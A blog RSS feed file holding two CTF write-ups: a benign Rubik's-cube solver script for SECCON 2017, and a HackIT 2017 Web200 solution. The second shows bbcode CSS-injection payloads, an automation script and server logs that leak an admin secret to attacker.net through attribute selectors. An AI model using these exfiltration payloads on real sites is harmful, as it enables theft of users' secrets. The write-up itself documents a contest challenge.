-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathfeed.xml
More file actions
971 lines (798 loc) · 66.6 KB
/
feed.xml
File metadata and controls
971 lines (798 loc) · 66.6 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>dba</title>
<description>Stylish Jekyll Theme</description>
<link>/</link>
<atom:link href="/feed.xml" rel="self" type="application/rss+xml" />
<item>
<title>CTF Write-up - SECCON 2017 Qubic Rube - Solving a Rubik's without force</title>
<description><p>Here’s the solution for a programming challenge I did during SECCON 2017.</p>
<p><img src="/assets/media/qubic1.png" alt="" /></p>
<h3 id="introduction">Introduction</h3>
<p>The challenge is a programming challenge, we get greeted with a three.js cube with 6 textures, one for each faces with a QR-Code on them. Using <code class="highlighter-rouge">zbar</code> to read them, we will see this message:</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="o">[</span>SECCON 2017 Online CTF <span class="o">]</span>
<span class="o">[</span>No. 1 / 50 <span class="o">]</span>
<span class="o">[</span>Qubic Rube <span class="o">]</span>
<span class="o">[</span>Next URL is: <span class="o">]</span>
<span class="o">[</span>Have fun! <span class="o">]</span>
<span class="o">[</span>http://qubicrube.pwn.seccon.jp:33654/02c286df1bbd7923d1f7]</code></pre></figure>
<p>Going to that page will redirect us to a page with another challenge:</p>
<p><img src="/assets/media/qubic2.png" alt="" /></p>
<p>Seems like we are going to code a rubiks solver.</p>
<h3 id="idea">Idea</h3>
<p>After seeing some other write-ups for this challenge, it seems like there’s a way to scramble the cube enough to give the solution with enough permutations. My solution is a little bit different in the fact that I am going to solve it using a rubiks solver rather than using a brute-forcy way.</p>
<p>The different difficulties I encountered during the challenge development:</p>
<ul>
<li>The color opposites of the cubes weren’t always the same (generally white is supposed to be at the opposite of yellow, red &lt;&gt; orange and blue &lt;&gt; green), but it wasn’t always the case and I lost some time because of that.</li>
<li>Sometimes the center of the cube wasn’t properly rotated, so I had to add a little bit more operations at the end of the script to try 3 other cube combinations and try to read a QR-code.</li>
</ul>
<h3 id="the-code">The code</h3>
<ul>
<li>Download the images for the 6 faces (or use local versions)</li>
<li>Crop the images into 9 pieces</li>
<li>Read the center color for each faces</li>
<li>Send it to a rubiks solver, here I am using the python library “kociemba”.</li>
<li>Create the different essential moves R (right), L (left), U (up), D (down), F (front) and B (back).
<ul>
<li>I could’ve optimised a little bit the code here by creating inverse move but decided to just to the move 3 times when seeing a quote (Ex: <code class="highlighter-rouge">R'</code>) and 2 times when I encounter a 2 (Ex: <code class="highlighter-rouge">R2</code>).</li>
</ul>
</li>
<li>Parse the solver’s output and use the different moves created</li>
<li>Put the pieces back together</li>
<li>Launch zbar on each of them 4 times (rotating the center piece)</li>
</ul>
<noscript><pre>import kociemba
from PIL import Image
import requests
import argparse
import logging as log
import zbar
import sys
import os
import random
from subprocess import *
# last 504ded069e4db4e3bef9
url = &quot;http://qubicrube.pwn.seccon.jp:33654/&quot;
parser = argparse.ArgumentParser()
parser.add_argument(&quot;prefix&quot;, help=&quot;the prefix to use, example 504ded069e4db4e3bef9&quot;)
parser.add_argument(&quot;-v&quot;, &quot;--verbose&quot;, help=&quot;increase output verbosity&quot;,
action=&quot;store_true&quot;)
parser.add_argument(&quot;-d&quot;, &quot;--download&quot;, help=&quot;download the challenge&quot;,
action=&quot;store_true&quot;)
args = parser.parse_args()
prefix = str(args.prefix.split(&quot;/&quot;)[-1:][0])
if args.verbose:
log.basicConfig(level=log.DEBUG, format=&quot;[+] %(message)s&quot;)
else:
log.basicConfig(level=log.WARNING)
log.info(&quot;Using prefix: &quot;+prefix)
suffix = [&quot;_R&quot;, &quot;_L&quot;, &quot;_U&quot;, &quot;_B&quot;, &quot;_F&quot;, &quot;_D&quot;]
extension = &quot;.png&quot;
requests_queue = []
if args.download:
for suf in suffix:
current_name = prefix + suf + extension
current_url = url + &quot;images/&quot; + current_name
log.info(current_url)
r = requests.get(current_url)
path = current_name
if r.status_code == 200:
with open(path, &#39;w+&#39;) as f:
for chunk in r.iter_content(1024):
f.write(chunk)
log.info(&quot;Getting &quot;+ prefix + suf)
s = 82
up = Image.open(prefix+&quot;_U.png&quot;)
right = Image.open(prefix+&quot;_R.png&quot;)
front = Image.open(prefix+&quot;_F.png&quot;)
down = Image.open(prefix+&quot;_D.png&quot;)
left = Image.open(prefix+&quot;_L.png&quot;)
back = Image.open(prefix+&quot;_B.png&quot;)
cube2 = []
def cropImages(img):
for i in range (0, 9):
cube2.append(img.copy().crop(((i % 3) * s, ((i / 3) % 3) * s, ((i % 3) + 1) * s, (((i / 3) % 3) + 1) * s)))
cropImages(up)
cropImages(right)
cropImages(front)
cropImages(down)
cropImages(left)
cropImages(back)
#URFDLB
def getColorBasic(img):
x = 0
while (img.getpixel((x, 0)) == (0, 0, 0)):
x += 1
return img.getpixel((x, 0))
U = getColorBasic(cube2[4])
R = getColorBasic(cube2[13])
F = getColorBasic(cube2[22])
D = getColorBasic(cube2[31])
L = getColorBasic(cube2[40])
B = getColorBasic(cube2[49])
# U = (255, 255, 255)
# D = (0, 81, 186) # blue
# R = (196, 30, 58) # red
# B = (255, 213, 0) # yellow
# F = (0, 158, 96) # green
# L = (255, 88, 0) # orange
def getColor(img):
x = 0
while (img.getpixel((x, 0)) == (0, 0, 0)):
x += 1
color = img.getpixel((x, 0))
if color == U:
return &quot;U&quot;
elif color == R:
return &quot;R&quot;
elif color == F:
return &quot;F&quot;
elif color == D:
return &quot;D&quot;
elif color == L:
return &quot;L&quot;
elif color == B:
return &quot;B&quot;
else:
logging.error(&quot;wtf color&quot;)
img.save(&quot;wtf.png&quot;)
sys.exit()
solve = &quot;&quot;
cube = &quot;&quot;
for i in cube2:
cube += getColor(i)
log.info(cube)
solve = kociemba.solve(cube)
log.info(solve)
def regenerateCube():
global up
global right
global front
global down
global left
global back
up = Image.new(&quot;RGB&quot;, (s*3, s*3))
for i in range(0,9):
up.paste(cube2[i], ((i % 3) * s,((i / 3) % 3) * s))
up.save(&quot;up.png&quot;)
right = Image.new(&quot;RGB&quot;, (s*3, s*3))
for i in range(9,18):
right.paste(cube2[i], ((i % 3) * s,((i / 3) % 3) * s))
right.save(&quot;right.png&quot;)
front = Image.new(&quot;RGB&quot;, (s*3, s*3))
for i in range(18,27):
front.paste(cube2[i], ((i % 3) * s,((i / 3) % 3) * s))
front.save(&quot;front.png&quot;)
down = Image.new(&quot;RGB&quot;, (s*3, s*3))
for i in range(27,36):
down.paste(cube2[i], ((i % 3) * s,((i / 3) % 3) * s))
down.save(&quot;down.png&quot;)
left = Image.new(&quot;RGB&quot;, (s*3, s*3))
for i in range(36,45):
left.paste(cube2[i], ((i % 3) * s,((i / 3) % 3) * s))
left.save(&quot;left.png&quot;)
back = Image.new(&quot;RGB&quot;, (s*3, s*3))
for i in range(45,54):
back.paste(cube2[i], ((i % 3) * s,((i / 3) % 3) * s))
back.save(&quot;back.png&quot;)
# 00-01-02
# 03-04-05
# 06-07-08
#36-37-38 18-19-20 09-10-11 45-46-47
#39-40-41 21-22-23 12-13-14 48-49-50
#42-43-44 24-25-26 15-16-17 51-52-53
# 27-28-29
# 30-31-32
# 33-34-35
def moveR():
log.info(&quot;Moving right&quot;)
copy = []
copy.append(cube2[2])
copy.append(cube2[5])
copy.append(cube2[8])
cube2[2] = cube2[20]
cube2[5] = cube2[23]
cube2[8] = cube2[26]
cube2[20] = cube2[29]
cube2[23] = cube2[32]
cube2[26] = cube2[35]
cube2[29] = cube2[51].rotate(180)
cube2[32] = cube2[48].rotate(180)
cube2[35] = cube2[45].rotate(180)
cube2[51] = copy[0].rotate(180)
cube2[48] = copy[1].rotate(180)
cube2[45] = copy[2].rotate(180)
i = right.rotate(270)
cube2[9] = i.crop((0, 0, s, s))
cube2[10] = i.crop((s, 0, s*2, s))
cube2[11] = i.crop((s*2, 0, s*3, s))
cube2[12] = i.crop((0, s, s, s*2))
cube2[13] = i.crop((s, s, s*2, s*2))
cube2[14] = i.crop((s*2, s, s*3, s*2))
cube2[15] = i.crop((0, s*2, s, s*3))
cube2[16] = i.crop((s, s*2, s*2, s*3))
cube2[17] = i.crop((s*2, s*2, s*3, s*3))
def moveD():
log.info(&quot;Moving down&quot;)
copy = []
copy.append(cube2[24])
copy.append(cube2[25])
copy.append(cube2[26])
cube2[24] = cube2[42]
cube2[25] = cube2[43]
cube2[26] = cube2[44]
cube2[42] = cube2[51]
cube2[43] = cube2[52]
cube2[44] = cube2[53]
cube2[51] = cube2[15]
cube2[52] = cube2[16]
cube2[53] = cube2[17]
cube2[15] = copy[0]
cube2[16] = copy[1]
cube2[17] = copy[2]
i = down.rotate(270)
cube2[27] = i.crop((0, 0, s, s))
cube2[28] = i.crop((s, 0, s*2, s))
cube2[29] = i.crop((s*2, 0, s*3, s))
cube2[30] = i.crop((0, s, s, s*2))
cube2[31] = i.crop((s, s, s*2, s*2))
cube2[32] = i.crop((s*2, s, s*3, s*2))
cube2[33] = i.crop((0, s*2, s, s*3))
cube2[34] = i.crop((s, s*2, s*2, s*3))
cube2[35] = i.crop((s*2, s*2, s*3, s*3))
def moveL():
log.info(&quot;Moving left&quot;)
copy = []
copy.append(cube2[27])
copy.append(cube2[30])
copy.append(cube2[33])
cube2[27] = cube2[18]
cube2[30] = cube2[21]
cube2[33] = cube2[24]
cube2[18] = cube2[0]
cube2[21] = cube2[3]
cube2[24] = cube2[6]
cube2[0] = cube2[53].rotate(180)
cube2[3] = cube2[50].rotate(180)
cube2[6] = cube2[47].rotate(180)
cube2[53] = copy[0].rotate(180)
cube2[50] = copy[1].rotate(180)
cube2[47] = copy[2].rotate(180)
i = left.rotate(270)
cube2[36] = i.crop((0, 0, s, s))
cube2[37] = i.crop((s, 0, s*2, s))
cube2[38] = i.crop((s*2, 0, s*3, s))
cube2[39] = i.crop((0, s, s, s*2))
cube2[40] = i.crop((s, s, s*2, s*2))
cube2[41] = i.crop((s*2, s, s*3, s*2))
cube2[42] = i.crop((0, s*2, s, s*3))
cube2[43] = i.crop((s, s*2, s*2, s*3))
cube2[44] = i.crop((s*2, s*2, s*3, s*3))
def moveU():
log.info(&quot;Moving up&quot;)
copy = []
copy.append(cube2[18])
copy.append(cube2[19])
copy.append(cube2[20])
cube2[18] = cube2[9]
cube2[19] = cube2[10]
cube2[20] = cube2[11]
cube2[9] = cube2[45]
cube2[10] = cube2[46]
cube2[11] = cube2[47]
cube2[45] = cube2[36]
cube2[46] = cube2[37]
cube2[47] = cube2[38]
cube2[36] = copy[0]
cube2[37] = copy[1]
cube2[38] = copy[2]
i = up.rotate(270)
cube2[0] = i.crop((0, 0, s, s))
cube2[1] = i.crop((s, 0, s*2, s))
cube2[2] = i.crop((s*2, 0, s*3, s))
cube2[3] = i.crop((0, s, s, s*2))
cube2[4] = i.crop((s, s, s*2, s*2))
cube2[5] = i.crop((s*2, s, s*3, s*2))
cube2[6] = i.crop((0, s*2, s, s*3))
cube2[7] = i.crop((s, s*2, s*2, s*3))
cube2[8] = i.crop((s*2, s*2, s*3, s*3))
def moveF():
log.info(&quot;Moving front&quot;)
copy = []
copy.append(cube2[15])
copy.append(cube2[12])
copy.append(cube2[9])
cube2[15] = cube2[8].rotate(270)
cube2[12] = cube2[7].rotate(270)
cube2[9] = cube2[6].rotate(270)
cube2[8] = cube2[38].rotate(270)
cube2[7] = cube2[41].rotate(270)
cube2[6] = cube2[44].rotate(270)
cube2[38] = cube2[27].rotate(270)
cube2[41] = cube2[28].rotate(270)
cube2[44] = cube2[29].rotate(270)
cube2[27] = copy[0].rotate(270)
cube2[28] = copy[1].rotate(270)
cube2[29] = copy[2].rotate(270)
i = front.rotate(270)
cube2[18] = i.crop((0, 0, s, s))
cube2[19] = i.crop((s, 0, s*2, s))
cube2[20] = i.crop((s*2, 0, s*3, s))
cube2[21] = i.crop((0, s, s, s*2))
cube2[22] = i.crop((s, s, s*2, s*2))
cube2[23] = i.crop((s*2, s, s*3, s*2))
cube2[24] = i.crop((0, s*2, s, s*3))
cube2[25] = i.crop((s, s*2, s*2, s*3))
cube2[26] = i.crop((s*2, s*2, s*3, s*3))
def moveB():
log.info(&quot;Moving back&quot;)
copy = []
copy.append(cube2[0])
copy.append(cube2[1])
copy.append(cube2[2])
cube2[0] = cube2[11].rotate(90)
cube2[1] = cube2[14].rotate(90)
cube2[2] = cube2[17].rotate(90)
cube2[11] = cube2[35].rotate(90)
cube2[14] = cube2[34].rotate(90)
cube2[17] = cube2[33].rotate(90)
cube2[35] = cube2[42].rotate(90)
cube2[34] = cube2[39].rotate(90)
cube2[33] = cube2[36].rotate(90)
cube2[42] = copy[0].rotate(90)
cube2[39] = copy[1].rotate(90)
cube2[36] = copy[2].rotate(90)
i = back.rotate(270)
cube2[45] = i.crop((0, 0, s, s))
cube2[46] = i.crop((s, 0, s*2, s))
cube2[47] = i.crop((s*2, 0, s*3, s))
cube2[48] = i.crop((0, s, s, s*2))
cube2[49] = i.crop((s, s, s*2, s*2))
cube2[50] = i.crop((s*2, s, s*3, s*2))
cube2[51] = i.crop((0, s*2, s, s*3))
cube2[52] = i.crop((s, s*2, s*2, s*3))
cube2[53] = i.crop((s*2, s*2, s*3, s*3))
def checkStatus():
global cube
cube = &quot;&quot;
for i in cube2:
cube += getColor(i)
log.info(cube)
log.info(kociemba.solve(cube))
def parseSolve(solve):
for i in solve.split(&quot; &quot;):
if i[-1:] == &quot;&#39;&quot;:
eval(&quot;move&quot;+i[0:1]+&quot;()&quot;)
regenerateCube()
eval(&quot;move&quot;+i[0:1]+&quot;()&quot;)
regenerateCube()
eval(&quot;move&quot;+i[0:1]+&quot;()&quot;)
elif i[-1:] == &quot;2&quot;:
eval(&quot;move&quot;+i[0:1]+&quot;()&quot;)
regenerateCube()
eval(&quot;move&quot;+i[0:1]+&quot;()&quot;)
else:
eval(&quot;move&quot;+i[0:1]+&quot;()&quot;)
regenerateCube()
checkStatus()
parseSolve(solve)
scanner = zbar.ImageScanner()
scanner.parse_config(&#39;enable&#39;)
def decodeImage(img):
image = zbar.Image(s*3, s*3, &#39;Y800&#39;, img.copy().convert(&#39;L&#39;).tostring())
scanner.scan(image)
for symbol in image:
print &quot;Found: [%s]&quot; % symbol.data
del(image)
def zbard():
decodeImage(up)
decodeImage(front)
decodeImage(down)
decodeImage(left)
decodeImage(right)
decodeImage(back)
def rotateCenter():
cube2[4] = cube2[4].rotate(90)
cube2[13] = cube2[13].rotate(90)
cube2[22] = cube2[22].rotate(90)
cube2[31] = cube2[31].rotate(90)
cube2[40] = cube2[40].rotate(90)
cube2[49] = cube2[49].rotate(90)
log.info(&quot;Solved&quot;)
zbard()
for i in range(3):
rotateCenter()
regenerateCube()
zbard()
</pre></noscript>
<script src="https://gist.github.com/rioru/5f2c9246e06bb2040acce89c0ac20a07.js"> </script>
</description>
<pubDate>Sun, 10 Dec 2017 00:00:00 +0100</pubDate>
<link>/ctf/ppm/2017/12/10/ctf-writeup-seccon-2017-rubiks.html</link>
<guid isPermaLink="true">/ctf/ppm/2017/12/10/ctf-writeup-seccon-2017-rubiks.html</guid>
</item>
<item>
<title>CTF Write-Up - HackIT CTF 2017 Web200</title>
<description><p>I participated at the HackIT 2017 CTF with team sec0d, and we finished first. As requested by some other teams, here’s a write-up for the Web200 CTF challenge of HackIT 2017.</p>
<p><img src="/assets/media/hackit_5.png" alt="" /></p>
<h3 id="introduction">Introduction</h3>
<p>The application seems pretty straightforward, we can register with an username, a password, and a secret. The goal of the challenge is to recover the secret of an administrator.</p>
<h3 id="solution">Solution</h3>
<p>Checking the source of the profile page, we can see some interesting information:</p>
<p>First, the secret is shown in an input tag. We can see that we can edit part of our profile as well by using <code class="highlighter-rouge">edit.php</code>. This page will edit the “about” field of our user.
We can also see that there is an administrator function commented in the html, hinting us of a potential XSS or similar attack, as the administrator will have a list of updated status in his dashboard.</p>
<p>XSS tentatives will be proven to be unsuccessful, as we do not have access to the <code class="highlighter-rouge">&lt;</code> and <code class="highlighter-rouge">&gt;</code> characters and we are not in an attribute. A bbcode function is however enabled on the application, allowing us to input interesting data, for example, <code class="highlighter-rouge">[code]Message[/code]</code> will be translated to <code class="highlighter-rouge">&lt;pre&gt;Message&lt;/pre&gt;</code>. Testing all possible bbcodes, one, in particular will be interesting to us, <code class="highlighter-rouge">color</code>.</p>
<p><img src="/assets/media/hackit_2.png" alt="" /></p>
<p>The <code class="highlighter-rouge">color</code> bbcode injected, we can see the result:</p>
<p><img src="/assets/media/hackit_3.png" alt="" /></p>
<p>As shown in the screenshot, the parameter “test” is inserted inside a <code class="highlighter-rouge">style</code> tag, and since other characters are not correctly filtered, we can do a CSS injection:</p>
<figure class="highlight"><pre><code class="language-css" data-lang="css"><span class="o">[</span><span class="nt">color</span><span class="o">=</span><span class="s1">"test;} * {background: url('http://attacker.net/test')"</span><span class="o">]</span><span class="nt">a</span><span class="o">[/</span><span class="nt">color</span><span class="o">]</span></code></pre></figure>
<p>Using that as input will change the background image of some HTML tags and generate a request to our website.</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash">80.252.154.43 - - <span class="o">[</span>27/Aug/2017:02:05:01 +0200] <span class="s2">"GET /test HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span></code></pre></figure>
<p>Now that we know we can inject CSS and that there is effectively a bot running on the app, we can try to recover the <code class="highlighter-rouge">input</code> value using attribute selector in CSS:</p>
<figure class="highlight"><pre><code class="language-css" data-lang="css"><span class="o">[</span><span class="nt">color</span><span class="o">=</span><span class="s1">"test;} input[value^="</span><span class="nt">h4ck1t</span><span class="s1">" i]{background: url('http://attacker.net/confirmed')"</span><span class="o">]</span><span class="nt">a</span><span class="o">[/</span><span class="nt">color</span><span class="o">]</span></code></pre></figure>
<p>This will check if the value of the input starts with h4ck1t, the <code class="highlighter-rouge">i</code> modifier after the selector is there to be case insensitive, since the page will lowercase all input value sent.</p>
<p>After sending that, we got our response, the flag format being <code class="highlighter-rouge">h4ck1t{flag}</code>, we can confirm that we only have to automate the attack :)</p>
<p>The server and bot being somewhat unreliable, we had to try everything manually. On a stable challenge, this challenge could be solved using a loop checking the character one by one.</p>
<noscript><pre>from pwn import *
from requests import *
import string
import sys
import time
def edit(s, cookie, bla):
s.post(&quot;http://tasks.ctf.com.ua:13373/edit.php&quot;, cookies=cookie, data={&quot;about&quot;: bla})
s = Session()
cookie = {&quot;PHPSESSID&quot;: &quot;85gdkck3eegdmu215o02ac8rq0&quot;}
bla = &#39;&#39;&#39;[color=&quot;test;} input[value^=&quot;&#39;&#39;&#39;+sys.argv[1]+&#39;&#39;&#39;&quot; i]{border-image: url(&#39;http://attacker.net/?a=&#39;&#39;&#39;+ sys.argv[1]+&#39;&#39;&#39;&quot;]a[/color]&#39;&#39;&#39;
log.info(&quot;Sending [%s, %s]&quot; % (i, bla))
edit(s, cookie, bla)
edit(s, cookie, bla)
r = s.get(&quot;http://tasks.ctf.com.ua:13373/profile.php&quot;, cookies=cookie)
print r.text</pre></noscript>
<script src="https://gist.github.com/rioru/8dd25be546c6bbcb3974c8deb549224c.js"> </script>
<p><code class="highlighter-rouge">Usage: python web200.py 'h4ck1t{c...'</code></p>
<p>And finally, in our logs, after a little bit of guessing and a sleep() time of 10 seconds…</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash">80.252.154.43 - - <span class="o">[</span>27/Aug/2017:04:11:51 +0200] <span class="s2">"GET /?a=h4ck1t{c</span><span class="nv">$$</span><span class="s2">0;} HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span>
80.252.154.43 - - <span class="o">[</span>27/Aug/2017:04:12:04 +0200] <span class="s2">"GET /?a=h4ck1t{c</span><span class="nv">$$</span><span class="s2">_0;} HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span>
80.252.154.43 - - <span class="o">[</span>27/Aug/2017:04:13:21 +0200] <span class="s2">"GET /?a=h4ck1t{c</span><span class="nv">$$</span><span class="s2">_10;} HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span>
80.252.154.43 - - <span class="o">[</span>27/Aug/2017:04:14:06 +0200] <span class="s2">"GET /?a=h4ck1t{c</span><span class="nv">$$</span><span class="s2">_1n0;} HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span>
80.252.154.43 - - <span class="o">[</span>27/Aug/2017:04:14:12 +0200] <span class="s2">"GET /?a=h4ck1t{c</span><span class="nv">$$</span><span class="s2">_1nj0;} HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span>
80.252.154.43 - - <span class="o">[</span>27/Aug/2017:04:14:52 +0200] <span class="s2">"GET /?a=h4ck1t{c</span><span class="nv">$$</span><span class="s2">_1nj30;} HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span>
80.252.154.43 - - <span class="o">[</span>27/Aug/2017:04:15:17 +0200] <span class="s2">"GET /?a=h4ck1t{c</span><span class="nv">$$</span><span class="s2">_1nj3ct10n1;} HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span>
80.252.154.43 - - <span class="o">[</span>27/Aug/2017:04:15:45 +0200] <span class="s2">"GET /?a=h4ck1t{c</span><span class="nv">$$</span><span class="s2">_1nj3ct10n_0;} HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span>
80.252.154.43 - - <span class="o">[</span>27/Aug/2017:04:16:20 +0200] <span class="s2">"GET /?a=h4ck1t{c</span><span class="nv">$$</span><span class="s2">_1nj3ct10n_0;} HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span>
80.252.154.43 - - <span class="o">[</span>27/Aug/2017:04:18:34 +0200] <span class="s2">"GET /?a=h4ck1t{c</span><span class="nv">$$</span><span class="s2">_1nj3ct10n_h0;} HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span>
80.252.154.43 - - <span class="o">[</span>27/Aug/2017:04:27:18 +0200] <span class="s2">"GET /?a=h4ck1t{c</span><span class="nv">$$</span><span class="s2">_1nj3ct10n_h0;} HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span>
80.252.154.43 - - <span class="o">[</span>27/Aug/2017:04:32:09 +0200] <span class="s2">"GET /?a=h4ck1t{c</span><span class="nv">$$</span><span class="s2">_1nj3ct10n_h0;} HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span>
80.252.154.43 - - <span class="o">[</span>27/Aug/2017:04:33:02 +0200] <span class="s2">"GET /?a=h4ck1t{c</span><span class="nv">$$</span><span class="s2">_1nj3ct10n_h10;} HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span>
80.252.154.43 - - <span class="o">[</span>27/Aug/2017:04:41:10 +0200] <span class="s2">"GET /?a=h4ck1t{c</span><span class="nv">$$</span><span class="s2">_1nj3ct10n_h1d0;} HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span>
80.252.154.43 - - <span class="o">[</span>27/Aug/2017:04:43:22 +0200] <span class="s2">"GET /?a=h4ck1t{c</span><span class="nv">$$</span><span class="s2">_1nj3ct10n_h1d30;} HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span>
